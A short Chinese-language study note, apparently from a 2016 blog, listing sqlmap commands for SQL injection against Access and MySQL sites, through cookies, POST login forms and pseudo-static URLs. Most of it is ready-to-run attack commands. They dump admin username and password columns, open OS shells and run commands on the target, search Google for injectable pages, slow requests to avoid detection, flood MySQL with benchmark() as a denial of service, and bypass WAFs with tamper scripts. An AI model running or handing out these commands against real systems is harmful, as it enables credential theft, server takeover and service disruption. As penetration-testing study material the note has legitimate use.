整理的SqlMap笔记

看课程时,整理的笔记。

SQLMAP安装及access注入

下载地址

注入点

./sqlmap.py -u "URL"

//-u指定URL,判断是否有注入

--tables

//猜表,access是跑表,线程最大为10

--columns -T admin

//对字段进行猜解,线程自定义

--dump -T admin -C "username,password"

//猜解内容,--dump显示内容

MySQL数据库注入

KALI Linux环境

注入点

sqlmap -u URL --dbs

//-u 指定URL,获取数据库

sqlmap -u URL -D dataname

//dataname指定数据库名,-D指定数据库
//获取指定数据库中的表
//与access不同,MySQL是爆表

sqlmap -u URL -D dataname -T 表名 --columns

//爆破表内容

sqlmap -u URL -D dataname -T 表名 --columns -c id,user,password --dump

//获取字段内容

Cookies注入

注入点

sqlmap -u "URL" --cookie "id=9" --table --level 2

//获取数据表名列表

sqlmap -u "URL" --cookie "id=9" --columns -T admin --level 2

//获取表名

sqlmap -u "URL" --cookie "id=9" --dump -T admin -C "username,password" --level 2

//显示表的内容

post登录框注入

几种注入方式:

./sqlmap -r seach-test.txt -p tfUPass

//-r指定文本,-p指定参数

BurpSuite抓包


sqlmap -u URL --forms

//-u指定URL,自动搜索

sqlmap -u URL --data "tfUName=1&tfUPass=1"

//指定参数搜索

交互写shell及命令执行

sqlmap -u URL --os-cmd=ipconfig

//需要目标站的根目录

sqlmap -u URL --os-shell

//获取shell,只要权限够大,可建用户(提权)

伪静态注入

sqlmap -u URL/xx*.html --dbs

//在xx后加上*,--dbs获取数据库

sqlmap -u URL/xx*.html -D 数据库名 --tables

//跑数据库

sqlmap -u URL/xx*.html -D 数据库名 -T 表名 --columns 

//跑表的字段

sqlmap -u URL/xx*.html -D 数据库名 -T 表名 -C password

//-C 获取password字段内容

请求延时

注入点

参数 --delay --safe-freq

sqlmap --dbs -u URL/xx*.html --delay 1

//--delay 延时1S

sqlmap --dbs -u URL/xx*.html --safe-freq 3

//更加人性化,--safe-freq 3代表次数

Google搜索

sqlmap -g inurl:php?id=1

//-g使用Google搜索

MySQL DOS攻击

注入点

select

benchmark(99999999999,0x70726f62616e646f,0x70726f62616e646f0x70726f62616e646f)

sqlmap -u URL --sql-shell

//获取一个shell
//执行benchmark()函数

绕过WAF防火墙

sqlmap -u URL -v 3 --dbs --batch --tamper "space2morehash.py"

//使用编码脚本绕过

space2hash.py base64encode.py charencode.py

//其他编码脚本,加密方式不一样
//不同脚本可能针对不同数据库和版本

taps:

sqlmap -u URL --privileges

//查看一下权限
最后由 不一样的少年 编辑于2016年05月17日 23:07